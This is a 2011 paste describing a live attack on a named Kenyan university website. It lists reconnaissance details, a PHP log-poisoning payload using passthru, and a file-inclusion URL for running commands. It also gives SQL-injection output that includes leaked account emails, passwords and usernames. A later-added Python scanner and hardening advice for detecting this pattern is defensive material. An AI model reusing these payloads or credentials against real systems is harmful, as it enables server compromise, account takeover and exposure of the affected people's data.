akajaymo

Untitled

Jul 26th, 2011
  1. Morning @lexxkinyanjui
  2.  
  3. Exploit target:www.jkuat.ac.ke
  4. Host IP:41.204.161.16
  5. Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/1.0.0d FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_perl/2.0.5 Perl/v5.12.3
  6. Powered-by: PHP/5.3.6
  7. DB Server: MySQL >=5
  8. Current User: jkuat_jkuat@localhost
  9. Sql Version: 5.1.58-log
  10. Current DB: jkuat_jkuat
  11. System User: jkuat_jkuat@localhost
  12. Host Name: cp-uon.kenet.or.ke
  13. Installation dir: /usr/local/
  14. DB User: 'jkuat_jkuat'@'localhost'
  15.  
  16.  
  17. Data Bases: information_schema
  18. jkuat_jkuat
  19.  
  20. With this info you can choose the attack you want because you have the DB and server type:
  21. If you want an RFI or LFI attack you can use some of my code:
  22.  
  23. http://www.jkuat.ac.ke/jamesscript=<? passthru(\$_GET[cmd]) ?>
  24. This will add a line into error_log, injecting my code. And
  25. now? We only have to load this file and send,
  26. via the cmd variable, the command we'd like to execute:
  27.  
  28. for example:http://www.jkuat.ac.ke/?file=../../../var/apache/error_log&cmd=uname -a
  29.  
  30. But this will be risky because they can resolve your address and/or location, plus Windows is not that advanced
  31. to handle more than 200 port connections:
  32.  
  33. So SQL injection with ': working a little magic, here is what I got:
  34. DATABASE:jkuat_jkuat
  35.  
  36. Table Name Columns
  37. tbl_user email password username
  38. tbl_units
  39. tbl_section
  40. tbl_programme_category
  41. tbl_programme
  42. tbl_links
  43. tbl_head
  44. tbl_faculty
  45. tbl_downloads_category
  46. tbl_downloads
  47. tbl_department
  48. tbl_contacts_main
  49. tbl_contacts
  50. tbl_comments
  51. tbl_campus_programme
  52. tbl_campus
  53. tbl_article
  54. tbl_announcement
  55.  
  56.  
  57. Now from there, since we have a users table that has email, passwords and username, we spoof again
  58. and we get
  59. email password username
  60. info@jkuat.ac.ke admin 89admin245
  61. kamochu@gmail.com kamochu001 kamochu
  62.  
  63.  
  64. DATABASE:information_schema
  65. Table Name Columns
  66. VIEWS
  67. USER_PRIVILEGES IS_GRANTABLE PRIVILEGE_TYPE TABLE_CATALOG GRANTEE
  68. TRIGGERS
  69. TABLE_PRIVILEGES
  70. TABLE_CONSTRAINTS
  71. TABLES
  72. STATISTICS
  73. SESSION_VARIABLES VARIABLE_VALUE VARIABLE_NAME
  74. SESSION_STATUS
  75. SCHEMA_PRIVILEGES
  76. SCHEMATA SQL_PATH DEFAULT_COLLATION_NAME DEFAULT_CHARACTER_SET_NAME SCHEMA_NAME CATALOG_NAME
  77. ROUTINES
  78. REFERENTIAL_CONSTRAINTS
  79. PROFILING SOURCE_LINE SOURCE_FILE SOURCE_FUNCTION SWAPS PAGE_FAULTS_MINOR PAGE_FAULTS_MAJOR MESSAGES_RECEIVED MESSAGES_SENT BLOCK_OPS_OUT BLOCK_OPS_IN CONTEXT_INVOLUNTARY CONTEXT_VOLUNTARY CPU_SYSTEM CPU_USER DURATION STATE SEQ QUERY_ID
  80. PROCESSLIST
  81. PLUGINS
  82. PARTITIONS
  83. KEY_COLUMN_USAGE
  84. GLOBAL_VARIABLES
  85. GLOBAL_STATUS
  86. FILES
  87. EVENTS
  88. ENGINES
  89. COLUMN_PRIVILEGES
  90. COLUMNS
  91. COLLATION_CHARACTER_SET_APPLICABILITY
  92. COLLATIONS
  93. CHARACTER_SETS
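The error_log injection and the later `?file=` include of that log, described in the paste above, leave a recognisable two-step trace in the web server's access log. The following is an added detection example, not part of the original paste; the log lines, client IPs, rule names and the `scan` helper are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); IPs and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jul/2011:08:01:12 +0300] "GET /index.php?page=news HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jul/2011:08:02:40 +0300] "GET /x=<?%20passthru($_GET[cmd])%20?> HTTP/1.1" 404 312 "-" "-"
203.0.113.9 - - [26/Jul/2011:08:03:05 +0300] "GET /?file=..%2F..%2F..%2Fvar%2Fapache%2Ferror_log&cmd=uname%20-a HTTP/1.1" 200 9981 "-" "-"
198.51.100.4 - - [26/Jul/2011:08:04:00 +0300] "GET /downloads/file.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
"""

# client IP, request line and status code from a combined-format log entry
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')
# a PHP open tag inside a request line: someone is trying to write code into a log
PHP_TAG = re.compile(r'<\?(php|=|\s)', re.I)
# directory traversal that ends at a web server log file
LOG_INCLUDE = re.compile(r'(\.\./){2,}.*?(error|access)[_.]?log', re.I)


def decode(s, rounds=2):
    """URL-decode more than once so double-encoded traversal is also seen."""
    for _ in range(rounds):
        s = unquote(s)
    return s


def scan(log_text):
    """Return (line_no, client_ip, rule) for every suspicious request."""
    findings, poisoners = [], set()
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQ.match(line)
        if not m:
            continue
        ip, request = m.group(1), decode(m.group(2))
        if PHP_TAG.search(request):
            poisoners.add(ip)
            findings.append((n, ip, "php-tag-in-request"))
        if LOG_INCLUDE.search(request):
            # escalate when the same client planted a PHP tag earlier
            rule = "log-include-after-poison" if ip in poisoners else "log-include"
            findings.append((n, ip, rule))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection only tells you the attempt happened; the include parameter itself should map to a fixed allow-list of files rather than accept a path, and the PHP process should not be able to read the server logs.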